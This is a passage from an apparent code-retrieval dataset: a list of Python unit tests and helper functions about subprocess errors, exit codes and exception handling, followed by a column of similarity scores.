stdout: {}, stderr: {}, '\n 'return code: {}.'.format(test_case.get_name(),\n stdout, stderr,\n proc.returncode))", "def test_error_message_from_background_process(self):\n one_process_workflow = \"\"\"file://B <- file://A\n error\n echo A produces B > B\n \"\"\"\n process = run_first_process(one_process_workflow)\n assert process.error_message.find(\"Process ended with error code\") >= 0, process.error_message", "def run(cmd):\n print ' '.join(cmd)\n try:\n check_call(cmd)\n except CalledProcessError as cpe:\n print \"Error: return code: \" + str(cpe.returncode)\n sys.exit(cpe.returncode)", "async def test_raise_call_error(base_central_system):\n call_error = CallError(\n unique_id=\"1337\",\n error_code=\"GenericError\",\n error_description=\"test_raise_call_error\",\n )\n await base_central_system.route_message(call_error.to_json())\n\n payload = call.ClearCachePayload()\n with pytest.raises(GenericError):\n await base_central_system.call(payload, suppress=False)", "def test_extract_raises(capsys):\n with mock.patch('uflash.extract', side_effect=RuntimeError(\"boom\")):\n with pytest.raises(SystemExit):\n uflash.main(argv=['--extract', 'test.py'])\n\n _, stderr = capsys.readouterr()\n expected = 'Error extracting test.py'\n assert expected in stderr", "def test_cmd_error(self):\n task = Task(\"uid\", False, False, \"does_not_exist\", None, \".\")\n task._checkpoint_dir = tmp_checkpoint_dir()\n with self.assertRaisesRegexp(RuntimeError, \".*executing Task's command:.*\"):\n task.run()\n task.shell = True\n with self.assertRaisesRegexp(RuntimeError, \".*executing Task's command:.*\"):\n task.run()\n task._dry_run = True\n task.run() # No longer raises RuntimeError", "def test_execute_process_killed():\n port = port_for.select_random()\n passing_check = check_tcp(port)\n\n def failing_check_for_testing_purposes():\n return False\n\n with pytest.raises(PostChecksFailed) as checks_failed:\n execute([SERVICE, 'tcp', '--port', str(port)], [passing_check, failing_check_for_testing_purposes], timeout=1)\n\n assert 'function failing_check_for_testing_purposes' in str(checks_failed.value)\n\n # The process will be killed and nothing will be listening on that port.\n wait_until(lambda: passing_check() is False)", "def test_watch_raises(capsys):\n with mock.patch('uflash.watch_file', side_effect=RuntimeError(\"boom\")):\n with pytest.raises(SystemExit):\n uflash.main(argv=['--watch', 'test.py'])\n\n _, stderr = capsys.readouterr()\n expected = 'Error watching test.py'\n assert expected in stderr", "def test_option_unhandled(self):\n cmd, output = runCmdOutput(['--__unhandled__'])\n self.assertEqual(cmd.returncode, os.EX_USAGE)", "def test_stats_issue_43328(test_file):\n fake_file = test_file.parent / \"fake.file\"\n with pytest.raises(CommandExecutionError):\n win_file.stats(fake_file)", "def testError(self):\n cmds = \"\"\"chown 0 missingFile\npwd\nexit\n\"\"\"\n\n def _cbCheckResult(res):\n self.assertNotIn(self.testDir.asBytesMode().path, res)\n\n d = self._getBatchOutput(cmds)\n d.addCallback(_cbCheckResult)\n return d", "def test_unexpected_error_in_signature(self):\n # TODO\n one_process_workflow = \"\"\"buggy://B <- file://A\n echo A produces B > B\n \"\"\"\n process = run_first_process(one_process_workflow, extra_resource=BuggySignatureResource)\n assert process.success is False, process.error_message\n assert process.error_message.find('An unexpected error have happen in tuttle while retrieving signature' \\\n ) >= 0, process.error_message\n assert process.error_message.find('Traceback 
(most recent call last):') >= 0, process.error_message\n assert process.error_message.find('raise Exception(\"Unexpected error in signature()\")') >= 0, process.error_message\n assert process.error_message.find('Process cannot be considered complete.') >= 0, process.error_message", "def crashed(self):\n\n return len(self.backtrace) > 0 or (self.run_as_script and self.return_code != 0)", "def test_invoke_processor_errors():\n\n def processor(app, documents):\n raise ValueError(\"something bad happened\")\n yield\n\n testapp = holocron.Application()\n testapp.add_processor(\"processor\", processor)\n testapp.add_pipe(\"test\", [{\"name\": \"processor\"}])\n\n stream = testapp.invoke(\"test\")\n\n with pytest.raises(ValueError, match=r\"^something bad happened$\"):\n next(stream)\n\n with pytest.raises(StopIteration):\n next(stream)", "def check_call(self, cmd, nonzero_e = tc.error_e):\n self.run(cmd, nonzero_e = nonzero_e)", "def test_shell_bad_command():\n out, err = shell_command(\"ls adasdasdas\")\n assert out is None\n assert \"adasdasdas\" in err", "def test_invoke_processor_not_found():\n\n testapp = holocron.Application()\n testapp.add_pipe(\"test\", [{\"name\": \"processor\"}])\n\n with pytest.raises(ValueError) as excinfo:\n next(testapp.invoke(\"test\"))\n\n assert str(excinfo.value) == \"no such processor: 'processor'\"", "def test_check_if_error(self):\n with self.assertRaises(MyError):\n SshErrorExitCodeController(255, ERROR_MESSAGE)\\\n .check_if_error()", "def test_check_if_error(self):\n with self.assertRaises(MyError):\n BaseErrorExitCodeController(ERROR_RETURN_CODE, ERROR_MESSAGE)\\\n .check_if_error()", "def pytest_internalerror(self, excrepr, excinfo):\n for line in str(excrepr).split(\"\\n\"):\n sys.stderr.write(\"INTERNALERROR> {}\\n\".format(line))\n sys.stderr.flush()\n tb = _postmortem_traceback(excinfo)\n post_mortem(tb, excinfo)", "def test_subprocess_fork_exception(self, mocker):\n mocker.stopall()\n\n test_command = [\"fake\", \"command\"]\n test_name = \"fake_command\"\n test_fork = True\n\n # mock\n mock_logging_debug = mocker.MagicMock(name=\"mock_logging_debug\")\n mock_os_fork = mocker.MagicMock(name=\"mock_os_fork\", side_effect=OSError)\n mock_sys_exit = mocker.MagicMock(name=\"mock_sys_exit\")\n mock_os_chdir = mocker.MagicMock(name=\"mock_os_chdir\")\n mock_os_setsid = mocker.MagicMock(name=\"mock_os_setsid\")\n mock_os_umask = mocker.MagicMock(name=\"mock_os_umask\")\n\n # patch\n mocker.patch.object(\n scarlett_os.subprocess.logging.Logger, \"debug\", mock_logging_debug\n )\n mocker.patch.object(scarlett_os.subprocess.os, \"fork\", mock_os_fork)\n mocker.patch.object(scarlett_os.subprocess.sys, \"exit\", mock_sys_exit)\n mocker.patch.object(scarlett_os.subprocess.os, \"chdir\", mock_os_chdir)\n mocker.patch.object(scarlett_os.subprocess.os, \"setsid\", mock_os_setsid)\n mocker.patch.object(scarlett_os.subprocess.os, \"umask\", mock_os_umask)\n\n tfork2 = scarlett_os.subprocess.Subprocess(\n test_command, name=test_name, fork=test_fork\n )\n\n # NOTE: Bit of duplication we have going here.\n assert mock_sys_exit.call_count == 2\n assert tfork2.stdout == False\n assert tfork2.stderr == False\n assert mock_os_chdir.call_count == 1\n assert mock_os_setsid.call_count == 1\n assert mock_os_umask.call_count == 1\n assert mock_os_fork.call_count == 2\n\n mock_os_chdir.assert_called_once_with(\"/\")\n\n mocker.stopall()", "def test_verify_error(self):\n task = Task(\"uid\", False, False, \"echo\", \"does_not_exist\", \".\", \"A\")\n task._checkpoint_dir = 
tmp_checkpoint_dir()\n with self.assertRaisesRegexp(RuntimeError, \".*executing Task's verification:.*\"):\n task.run()\n task.shell = True\n with self.assertRaisesRegexp(RuntimeError, \".*executing Task's verification:.*\"):\n task.run()\n task._dry_run = True\n task.run() # No longer raises RuntimeError", "def call_error():\r\n print(\"Error in input format.\")\r\n sys.exit()", "def test_failing_git_command(self):\n code = Code(self.build)\n\n proc_mock = Mock()\n proc_mock.returncode = 1\n response = Response(proc_mock, '', 'herp derp')\n code._command = Mock(return_value=response)\n code._which_git = Mock(return_value='lol')\n code.update()", "def report_error_handled(self, calculation, action):\n arguments = [calculation.process_label, calculation.pk, calculation.exit_status, calculation.exit_message]\n self.report('{}<{}> failed with exit status {}: {}'.format(*arguments))\n self.report(f'Action taken: {action}')", "def test_signal_no_pid(self):\n code, out, err = self.t.runError(\"--pid 0\")\n self.assertIn(\"A non-zero PID must be specified.\", out)", "def test_stopProcessUnknownKeyError(self):\r\n self.assertRaises(KeyError, self.pm.stopProcess, \"foo\")", "def determine_exit_code(self) -> int:", "def HandlePipelineToolsCalledProcessError( exc ):\n errorMsg = StringIO()\n errorMsg.write( \"Pipeline Tools encountered an error - the command:\" )\n errorMsg.write( os.linesep * 2 )\n errorMsg.write( exc.cmd )\n errorMsg.write( os.linesep * 2 )\n errorMsg.write( \"return a non-zero (%d) exit code\" % exc.returncode )\n\n if exc.output:\n errorMsg.write( \" and the following output:\" )\n errorMsg.write( os.linesep * 2 )\n errorMsg.write( exc.output )\n\n errorMsg = errorMsg.getvalue()\n # On Windows, print statements output to the console window that is created minimized when Katana launches\n print( errorMsg )\n\n # Display a human-readable generic error message\n ShowModalDialog( \"Pipeline Tools Error\",\n \"Pipeline Tools encountered an error. 
Check the Katana console for more detailed information.\" )\n\n return \"Pipeline Tools Error\"", "def test_install_subprocess_error_should_fail(self, *args):\n manifest = self.generate_mock_manifest(cfg={\n EXTCFG_SECTION.INSTALL: {\n EXTCFG_OPTION.EXEC_EXT_CMD: ['command'],\n }\n })\n ext_manager = PkgInstExtrasManager(manifest)\n with pytest.raises(exceptions.InstExtrasManagerError):\n ext_manager.handle_install_extras()", "def procFail(proc):\n\tif 'a' in proc.config._notify.when['pipeline']:\n\t\tlogger.debug('Notifying process fails')\n\t\tEMAIL.send('proc', proc, 'abort')", "def test_args_bad_value(testapp, args, error):\n\n with pytest.raises(ValueError) as excinfo:\n next(archive.process(testapp, [], **args))\n assert str(excinfo.value) == error", "def test_exceptions_on_the_test(self):\n try:\n raise Exception(\"faki faki faki\")\n except Exception as e:\n #TODO: write a proper test to verify exception logging\n res = output(e, \"ERROR\")\n eq_(type(\"\"),type(res))\n eq_(\"GREAP ERROR faki faki faki\",res)\n eq_(True,mymock.called)", "def test_process_path(path):\n try:\n subprocess.call([path, \"--version\"])\n return True\n except:\n print(\"Cannot find executable on {}\".format(path))\n return False", "def test_start_process(self, mocked_check):\n from supvisors.rpcinterface import RPCInterface\n # get patches\n mocked_start = self.supervisor.supvisors.starter.start_process\n mocked_progress = self.supervisor.supvisors.starter.in_progress\n # create RPC instance\n rpc = RPCInterface(self.supervisor)\n # patch the instance\n rpc._get_application_process = Mock()\n # test RPC call with unknown strategy\n with self.assertRaises(RPCError) as exc:\n rpc.start_process('strategy', 'appli:proc')\n self.assertEqual(Faults.BAD_STRATEGY, exc.exception.code)\n self.assertEqual('BAD_STRATEGY: strategy', exc.exception.text)\n self.assertEqual([call()], mocked_check.call_args_list)\n self.assertEqual(0, mocked_start.call_count)\n self.assertEqual(0, mocked_progress.call_count)\n mocked_check.reset_mock()\n # test RPC call with running process\n rpc._get_application_process.return_value = (\n None, Mock(**{'running.return_value': True,\n 'namespec.return_value': 'proc1'}))\n with self.assertRaises(RPCError) as exc:\n rpc.start_process(0, 'appli_1')\n self.assertEqual(Faults.ALREADY_STARTED, exc.exception.code)\n self.assertEqual('ALREADY_STARTED: proc1', exc.exception.text)\n self.assertEqual([call()], mocked_check.call_args_list)\n self.assertEqual(0, mocked_start.call_count)\n self.assertEqual(0, mocked_progress.call_count)\n mocked_check.reset_mock()\n # test RPC call with running processes\n rpc._get_application_process.return_value = (\n Mock(**{'processes.values.return_value': [\n Mock(**{'running.return_value': False}),\n Mock(**{'running.return_value': True,\n 'namespec.return_value': 'proc2'})]}), None)\n with self.assertRaises(RPCError) as exc:\n rpc.start_process(0, 'appli_1')\n self.assertEqual(Faults.ALREADY_STARTED, exc.exception.code)\n self.assertEqual('ALREADY_STARTED: proc2', exc.exception.text)\n self.assertEqual([call()], mocked_check.call_args_list)\n self.assertEqual(0, mocked_start.call_count)\n self.assertEqual(0, mocked_progress.call_count)\n mocked_check.reset_mock()\n # test RPC call with stopped processes\n proc_1 = Mock(**{'running.return_value': False,\n 'stopped.return_value': True,\n 'namespec.return_value': 'proc1'})\n proc_2 = Mock(**{'running.return_value': False,\n 'stopped.return_value': False,\n 'namespec.return_value': 'proc2'})\n 
rpc._get_application_process.return_value = (\n Mock(**{'processes.values.return_value': [\n proc_1, proc_2]}), None)\n # test RPC call with no wait and not done\n mocked_start.return_value = False\n result = rpc.start_process(1, 'appli:*', 'argument list', False)\n self.assertTrue(result)\n self.assertEqual([call()], mocked_check.call_args_list)\n self.assertEqual([call(1, proc_1, 'argument list'),\n call(1, proc_2, 'argument list')], mocked_start.call_args_list)\n self.assertEqual(0, mocked_progress.call_count)\n mocked_check.reset_mock()\n mocked_start.reset_mock()\n # test RPC call no wait and done\n mocked_start.return_value = True\n result = rpc.start_process(1, 'appli:*', 'argument list', False)\n self.assertTrue(result)\n self.assertEqual([call()], mocked_check.call_args_list)\n self.assertEqual([call(1, proc_1, 'argument list'),\n call(1, proc_2, 'argument list')], mocked_start.call_args_list)\n self.assertEqual(0, mocked_progress.call_count)\n mocked_check.reset_mock()\n mocked_start.reset_mock()\n # test RPC call with wait and done\n result = rpc.start_process(2, 'appli:*', wait=True)\n self.assertTrue(result)\n self.assertEqual([call(2, proc_1, ''), call(2, proc_2, '')],\n mocked_start.call_args_list)\n self.assertEqual(0, mocked_progress.call_count)\n mocked_check.reset_mock()\n mocked_start.reset_mock()\n # test RPC call with wait and not done\n mocked_start.return_value = False\n deferred = rpc.start_process(2, 'appli:*', wait=True)\n # result is a function for deferred result\n self.assertTrue(callable(deferred))\n self.assertEqual([call()], mocked_check.call_args_list)\n self.assertEqual([call(2, proc_1, ''), call(2, proc_2, '')],\n mocked_start.call_args_list)\n self.assertEqual(0, mocked_progress.call_count)\n # test returned function: return True when job in progress\n mocked_progress.return_value = True\n self.assertEqual(NOT_DONE_YET, deferred())\n self.assertEqual([call()], mocked_progress.call_args_list)\n mocked_progress.reset_mock()\n # test returned function: raise exception if job not in progress anymore\n # and process still stopped\n mocked_progress.return_value = False\n with self.assertRaises(RPCError) as exc:\n deferred()\n self.assertEqual(Faults.ABNORMAL_TERMINATION, exc.exception.code)\n self.assertEqual('ABNORMAL_TERMINATION: proc1', exc.exception.text)\n self.assertEqual([call()], mocked_progress.call_args_list)\n mocked_progress.reset_mock()\n # test returned function: return True if job not in progress anymore\n # and process running\n proc_1.stopped.return_value = False\n self.assertTrue(deferred())\n self.assertEqual([call()], mocked_progress.call_args_list)", "def test_call(*args, **kwargs):\n try:\n subprocess.check_output(*args, **kwargs)\n return True\n except Exception:\n return False", "def test_ns_fail2():\n env = NsSimPyEnvironment()\n env.process(some_process(env, 4e-29))\n env.run()", "def test_isort_tool_plugin_scan_oserror(mock_subprocess_check_output):\n mock_subprocess_check_output.side_effect = OSError(\"mocked error\")\n itp = setup_isort_tool_plugin()\n package = Package(\n \"valid_package\", os.path.join(os.path.dirname(__file__), \"valid_package\")\n )\n package[\"python_src\"] = [\n os.path.join(os.path.dirname(__file__), \"valid_package\", \"sample.py\")\n ]\n issues = itp.scan(package, \"level\")\n assert not issues", "def shellExecErrorCode(cmd):\n return subprocess.call(cmd, shell=True)", "def test_check_if_error_one(self):\n with self.assertRaises(MyError):\n SshpassErrorExitCodeController(ERROR_RETURN_CODE, 
ERROR_MESSAGE)\\\n .check_if_error()", "def error_check(command):\r\n\r\n # TODO\r", "def test_DDSim_runIt_failure_inputFile(self):\n self.ddsim.platform = \"Windows\"\n self.ddsim.applicationLog = self.logFileName\n self.ddsim.InputFile = \"pairs.hepmc\"\n ## side effect for Script, log, logAfter\n with patch(\"os.path.exists\", new=Mock(side_effect=[False, False, True] ) ):\n res = self.ddsim.runIt()\n self.assertEqual( res['Message'], \"no pairs.hepmc\" )", "def _safe_call(cmd_list):\n try:\n subprocess.check_output(cmd_list)\n return True\n except subprocess.CalledProcessError as err_thrown:\n print('Error while calling \"%s\"', err_thrown.cmd)\n return False", "def test_does_not_crash(self):\n py_function(6)", "def prnt_error():\n print \"Error!\\n\"\n return False", "def errReceived(self, data):\n log.msg(\"Error output from process: \" + data,\n isError=True)", "def supercall(command):\n p = subprocess.Popen(command, shell=True, stderr=subprocess.PIPE)\n retval = p.wait()\n \n if retval != 0:\n get_logger().critical('error calling {}'.format(command))\n for line in p.stderr.readlines():\n get_logger().critical(line.decode('utf8').replace('\\n', ''))\n\n return retval", "def test_has_receivers(error_report_mock):\n\n app_crash()\n error_report_mock.assert_not_called()\n\n signal('panic').connect(triage)\n app_crash()\n error_report_mock.assert_called_with()", "def test_command(self):\r\n with self.assertRaises(SystemExit) as ex:\r\n with self.assertRaisesRegexp(CommandError, 'This script requires.*'):\r\n call_command('git_export', 'blah', 'blah', 'blah',\r\n stderr=StringIO.StringIO())\r\n self.assertEqual(ex.exception.code, 1)\r\n\r\n with self.assertRaises(SystemExit) as ex:\r\n with self.assertRaisesRegexp(CommandError, 'This script requires.*'):\r\n call_command('git_export', stderr=StringIO.StringIO())\r\n self.assertEqual(ex.exception.code, 1)\r\n\r\n # Send bad url to get course not exported\r\n with self.assertRaises(SystemExit) as ex:\r\n with self.assertRaisesRegexp(CommandError, GitExportError.URL_BAD):\r\n call_command('git_export', 'foo/bar/baz', 'silly',\r\n stderr=StringIO.StringIO())\r\n self.assertEqual(ex.exception.code, 1)\r\n # Send bad course_id to get course not exported\r\n with self.assertRaises(SystemExit) as ex:\r\n with self.assertRaisesRegexp(CommandError, GitExportError.BAD_COURSE):\r\n call_command('git_export', 'foo/bar:baz', 'silly',\r\n stderr=StringIO.StringIO())\r\n self.assertEqual(ex.exception.code, 1)", "def test_cond_with_uncaught_error(env):\n def explode(env, delay):\n yield env.timeout(delay)\n raise ValueError(f'Onoes, failed after {delay}!')\n\n def process(env):\n yield env.timeout(1) | env.process(explode(env, 2))\n\n env.process(process(env))\n try:\n env.run()\n assert False, 'There should have been an exception.'\n except ValueError:\n pass\n assert env.now == 2", "def test_sandbox_errors_false(self):\n SignalHook(self.test_extension, self.signal, self._on_signal_exception,\n sandbox_errors=False)\n\n self.assertEqual(len(self._on_signal_exception.calls), 0)\n self.assertRaises(Exception, self.signal.send, self)\n self.assertEqual(len(self._on_signal_exception.calls), 1)", "def test_main_fails_on_request_error(\n runner: CliRunner, mock_requests_get: MockFixture\n) -> None:\n mock_requests_get.side_effect = Exception(\"Boom\")\n result = runner.invoke(console.main)\n assert result.exit_code == 1", "def test_example(self, _, cmd):\n out = subprocess.run(cmd, shell=True)\n self.assertFalse(out.returncode)", "def 
testIgnoredError(self):\n cmds = \"\"\"-chown 0 missingFile\npwd\nexit\n\"\"\"\n def _cbCheckResult(res):\n self.assertIn(self.testDir.asBytesMode().path, res)\n\n d = self._getBatchOutput(cmds)\n d.addCallback(_cbCheckResult)\n return d", "def test_exit_on_missing_file(self):\n with self.assertRaises(SystemExit):\n pyint = Interpreter()\n pyint.run(file=MISSING_FILE)", "def test_main_failure(logger, argv):\n assert app.main(argv) == 1\n logger.error.called_once()", "def test_check_process_output(self):\n workflow = self.get_workflow(\n \"\"\"file://result <- file://source\n echo test\n \"\"\")\n workflow.pre_check_processes()\n try:\n process = workflow._processes[0]\n create_tuttle_dirs()\n workflow.run_process(process)\n assert False, \"Exception has not been not raised\"\n except ResourceError:\n assert True", "def error_handler(self):\n if self.ctx.exit_code is not None:\n return self.ctx.exit_code", "def test_removeProcessUnknownKeyError(self):\r\n self.pm.startService()\r\n self.assertRaises(KeyError, self.pm.removeProcess, \"foo\")", "def side_effect(command, stdout, stderr):\n if any('always-auth' in arg for arg in command):\n raise subprocess.CalledProcessError(\n returncode=1,\n cmd=command\n )\n\n return mock.DEFAULT", "def get_exit_code(self):", "def test_send_error_to_admin(self, process_mock, send_smtp_mock):\n # arrange an mock error during processing\n process_mock.side_effect = RuntimeError('mock error')\n\n with name_of_file_containing('contents') as filename:\n call_command('process_email', email_file=filename)\n\n self.assertTrue(send_smtp_mock.called)\n (msg,) = send_smtp_mock.call_args.args\n self.assertEqual(msg['to'], 'admin@example.com', 'Admins should be emailed on error')\n self.assertIn('error', msg['subject'].lower(), 'Error email subject should indicate error')\n self.assertTrue(msg.is_multipart(), 'Error email should have attachments')\n parts = msg.get_payload()\n self.assertEqual(len(parts), 3, 'Error email should contain message, traceback, and original message')\n content = parts[0].get_payload()\n traceback = parts[1].get_payload()\n original = parts[2].get_payload(decode=True).decode() # convert octet-stream to string\n self.assertIn('RuntimeError', content, 'Error type should be included in error email')\n self.assertIn('mock.py', content, 'File where error occurred should be included in error email')\n self.assertIn('traceback', traceback.lower(), 'Traceback should be attached to error email')\n self.assertEqual(original, 'contents', 'Original message should be attached to error email')", "def expect_failure(self):\n class StopCode(Exception):\n \"\"\"This exception will be raised instead of exiting the program.\"\"\"\n def __init__(self, exit_code):\n self.exit_code = exit_code\n\n def stop_code(arg):\n raise StopCode(arg)\n\n with mock.patch('sys.exit') as exit:\n exit.side_effect = stop_code\n try:\n with mock.patch('sys.stderr'):\n yield\n except StopCode as exc:\n self.assertTrue(exc.exit_code > 0)\n exit.assert_called()", "def test_sandbox_errors_true(self):\n SignalHook(self.test_extension, self.signal, self._on_signal_exception,\n sandbox_errors=True)\n\n self.assertEqual(len(self._on_signal_exception.calls), 0)\n self.signal.send(self)\n self.assertEqual(len(self._on_signal_exception.calls), 1)", "def errorCheck(sh, returncode, stderr):\n\tif returncode!=0 or stderr!='':\n\t\tif config.DEBUG:\n\t\t\tmsg = \"sh code execution [%s] returned non-zero exit status [%s] and/or non-empty stdterr [%s]\" % (repr(sh), returncode, 
repr(stderr.strip()))\n\t\telse:\n\t\t\tmsg = \"sh code execution returned non-zero exit status and/or non-empty stdterr\"\n\t\traise Exception(msg)", "def test_broken_error_descriptor(self):\r\n with self.assertRaises(TestException):\r\n module = self.descriptor._xmodule", "def isfailure(self):\n\n return self.proc.returncode != 0", "def test_broken_error_module(self):\r\n with self.assertRaises(TestException):\r\n module = self.descriptor._xmodule", "def test_process_id():\n output = sh.process_id()\n assert isinstance(output, int) and output > 0", "def script_test(path):\n log.info(\" ... EXECUTING {}\".format(str(path)))\n\n cmd = [sys.executable, str(path)]\n cp = subprocess.run(cmd, stderr=subprocess.PIPE)\n if cp.returncode:\n log.info(\" ... FAILED\")\n log.info(\" ___ TRACEBACK\")\n log.info(cp.stderr.decode(\"utf-8\") + \"\\n\\n\")\n return False\n else:\n log.info(\" ... PASSED\")\n return True", "def _check_error(return_value):\n if return_value < 0:\n raise IOError(pm.lib.Pm_GetErrorText(return_value))", "def test_handles_error(self):\n with self.assertRaises(ForcedExit):\n self.run_command(mkdtemp())\n\n self.assertResults(\n result_with_hint(\n u'This repository has not been initialized.',\n GIT_REPO_NOT_INITIALIZED),\n self.error)", "def test_NameError(n=2):\n\n p = platform_name()\n\n try:\n p.result()\n except NameError:\n print(\"Caught NameError\")\n else:\n assert False, \"Raise the wrong Error\"" ]
[ "0.66911113", "0.64319515", "0.63943857", "0.63668126", "0.6338667", "0.63044673", "0.63034093", "0.6283694", "0.62171775", "0.6183645", "0.61580575", "0.6093192", "0.6079444", "0.603348", "0.6027173", "0.5997922", "0.59800065", "0.59751534", "0.59546334", "0.5954266", "0.5952915", "0.5950407", "0.5940823", "0.5938315", "0.5936006", "0.5910566", "0.58934283", "0.58907115", "0.5888934", "0.5878262", "0.5869655", "0.5857681", "0.5855828", "0.58498514", "0.5837764", "0.58310163", "0.5826163", "0.5824052", "0.58215964", "0.58190316", "0.5811657", "0.5808997", "0.58084625", "0.580711", "0.57744235", "0.57393813", "0.5732496", "0.5724523", "0.57161075", "0.5712371", "0.5709087", "0.57071835", "0.57047236", "0.5691978", "0.5677486", "0.56693155", "0.5657402", "0.56558996", "0.565308", "0.5649697", "0.5647792", "0.5646234", "0.56461334", "0.5643843", "0.56422126", "0.56357884", "0.5632547", "0.562886", "0.5624747", "0.5613597", "0.56036216", "0.55999523", "0.5598975", "0.5593832", "0.5591292", "0.5583989", "0.55821043", "0.55819696", "0.5571361", "0.55705565", "0.5569407", "0.55691683", "0.55651265", "0.55651", "0.5559164", "0.55580276", "0.5557747", "0.5550513", "0.5548187", "0.55465066", "0.55371517", "0.5536441", "0.5534309", "0.5531631", "0.55276555", "0.5521732", "0.55160487", "0.5508824", "0.5502101", "0.5499891" ]
0.6745141
0
Get the release history from PyPI

Use the JSON API to get the release history from PyPI. The returned JSON structure includes a 'releases' dictionary whose keys are release numbers and whose values are arrays of uploaded files. While we don't have a 'release time' per se (only the upload time on each of the files), we'll take the timestamp on the first source file found (typically a .zip or .tar.gz) as the 'release time'. This is inexact, but should be close enough for our purposes.
def get_releases_for_package(name, since):
    # PyPI's JSON API lives at /pypi/<name>/json; urlreq, json,
    # _parse_pypi_released and Release are imports/helpers defined
    # elsewhere in this module.
    f = urlreq.urlopen("https://pypi.org/pypi/%s/json" % name)
    jsondata = f.read()
    data = json.loads(jsondata)

    releases = []
    for relname, rellist in data['releases'].items():
        for rel in rellist:
            if rel['python_version'] == 'source':
                when = _parse_pypi_released(rel['upload_time'])
                # for speed, skip releases older than `since`
                if when < since:
                    continue
                releases.append(
                    Release(
                        name,
                        relname,
                        rel['filename'],
                        when))
                break
    return releases
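A minimal usage sketch (a hypothetical driver, not part of the original module; it assumes get_releases_for_package and its helpers (urlreq, _parse_pypi_released, Release) are in scope, and that _parse_pypi_released returns a datetime comparable to `since`):

from datetime import datetime, timedelta

# List source releases of a package uploaded in the last 90 days.
# "requests" is only an example package name.
since = datetime.utcnow() - timedelta(days=90)
for rel in get_releases_for_package("requests", since):
    print(rel)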
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def list_releases():\n response = requests.get(PYPI_URL.format(package=PYPI_PACKAGE_NAME))\n if response:\n data = response.json()\n\n releases_dict = data.get('releases', {})\n\n if releases_dict:\n for version, release in releases_dict.items():\n release_formats = []\n published_on_date = None\n for fmt in release:\n release_formats.append(fmt.get('packagetype'))\n published_on_date = fmt.get('upload_time')\n\n release_formats = ' | '.join(release_formats)\n print('{:<10}{:>15}{:>25}'.format(version, published_on_date, release_formats))\n else:\n print('No releases found for {}'.format(PYPI_PACKAGE_NAME))\n else:\n print('Package \"{}\" not found on Pypi.org'.format(PYPI_PACKAGE_NAME))", "def versionHistory(self):\n url = self.metaData().getLink(\"version-history\")\n assert url is not None\n\n header = self._baseHeader.copy()\n response = self._adapter.getRequest(url, header)\n\n return json.loads(response['Body'])", "def get_current_release_downloads():\n downloads = (\n get_downloads_metadata()\n ['releases']\n [get_current_release()]\n ['downloads'])\n\n def up_to_date(dir, urls):\n try:\n df = pandas.read_csv(join(dir, \"DOWNLOAD_INFO.csv\"))\n return list(df.url) == list(urls)\n except IOError:\n return None\n\n return OrderedDict(\n (download[\"name\"], {\n 'downloaded': exists(join(get_downloads_dir(), download[\"name\"])),\n 'up_to_date': up_to_date(\n join(get_downloads_dir(), download[\"name\"]),\n [download['url']] if 'url' in download else download['part_urls']),\n 'metadata': download,\n }) for download in downloads\n )", "def Releases():\n return releases", "def releases(releaser, count):\n releases = sorted(\n releaser.get_releases().values(),\n key=lambda rel: rel[\"end_timestamp\"],\n reverse=True,\n )\n click.echo(f\"Latest {count} releases:\")\n for release in releases[:count]:\n click.echo(f'{release[\"end_timestamp\"]} {release[\"commit\"]}')", "def latest(data):\n result = dict()\n version = parse(\"0\")\n for release, info in data.items():\n python_version = Pypi._get_python_version(info)\n ver = parse(release)\n if not ver.is_prerelease:\n version = max(version, ver)\n python_version = python_version\n\n result = dict(version=str(version), python_version=python_version)\n\n return [result]", "def getCommitsSinceLastRelease(self):\n f = open(self.last_released, 'r')\n old_rev = f.read().replace('\\n', '')\n f.close()\n new_rev = commands.getoutput('cd '+self.proj_dir+' && git log -1 --format=%H')\n cmd = 'cd '+self.proj_dir+' && git log --no-merges --pretty=format:\"%s\" '+old_rev+'..'+new_rev\n unreleased_commits = commands.getoutput(cmd) \n print 'Commits since last release:'\n print unreleased_commits\n unreleased_commits = unreleased_commits.split('\\n')\n self.commit_msgs = unreleased_commits\n self.new_rev = new_rev", "def get_release_info():\n major_info = fetch_json(\n \"https://product-details.mozilla.org/1.0/\" \"firefox_history_major_releases.json\"\n )\n if major_info is None:\n raise Exception(\"Failed to fetch major version info\")\n minor_info = fetch_json(\n \"https://product-details.mozilla.org/1.0/\"\n \"firefox_history_stability_releases.json\"\n )\n if minor_info is None:\n raise Exception(\"Failed to fetch minor version info\")\n\n return {\"major\": major_info, \"minor\": minor_info}", "def get_release_info(self, version):\r\n try:\r\n return self._detail[\"releases\"][version]\r\n except KeyError as key_error:\r\n log.warning(key_error)\r\n return []", "def latest_release_get():\n try:\n return json_response.success({'version': 
version.latest_version()})\n except version.Error as e:\n return json_response.error(str(e)), 200", "def get_previous_release_info(\n previous_release_version: str | None, past_releases: list[ReleaseInfo], current_release_version: str\n) -> str | None:\n previous_release = None\n if previous_release_version == current_release_version:\n # Re-running for current release - use previous release as base for git log\n if len(past_releases) > 1:\n previous_release = past_releases[1].last_commit_hash\n else:\n previous_release = past_releases[0].last_commit_hash if past_releases else None\n return previous_release", "def get_history(cls, api, history):\n api_base = api.split('/')[-1]\n cursor = cls.history_index.cursor()\n cursor.execute(\n \"select filename from history where api=? and ymdh=?;\",\n (api_base, history))\n files = [r[0] for r in cursor]\n cls.history_index.commit()\n if not files:\n return {}\n results = {}\n for fn in files:\n ts = re.split('[?@]', fn)[-1].replace('.gz', '')\n fn_full = os.path.join(config.base_store_dir, fn)\n fd = (gzip.open if fn.endswith('.gz') else open)(fn_full)\n results[ts] = json.load(fd, encoding='utf8')\n fd.close()\n return results", "def GetVersions(url, requestedProduct, requestedVersion):\n dictValidReleasesSorted = {}\n response = requests.get(url)\n if response.status_code == 200:\n jsonResult = response.json()\n jVersions = jsonResult[requestedProduct][\"versions\"]\n dictValidReleases = {}\n # do not want pre-releases; filter them out\n for item in jVersions.items(): \n for build in item[1][\"builds\"]:\n if (build[\"os\"] == SUPPORTED_OS):\n if (build[\"arch\"] == SUPPORTED_ARCH):\n if not (re.search('[a-zA-Z]', item[1][\"version\"])): \n dictValidReleases[item[1][\"version\"]] = build[\"url\"]\n\n for key in sorted(dictValidReleases,key=LooseVersion):\n dictValidReleasesSorted[key] = dictValidReleases[key]\n else:\n raise requests.ConnectionError(\"Server did not return status 200 - returned {0}\".format(response.status_code))\n\n return dictValidReleasesSorted", "def get_latest_tags(self):\n\n start = len(self.tags) - self.num_comparisons\n tags = self.tags\n latest = []\n for i in 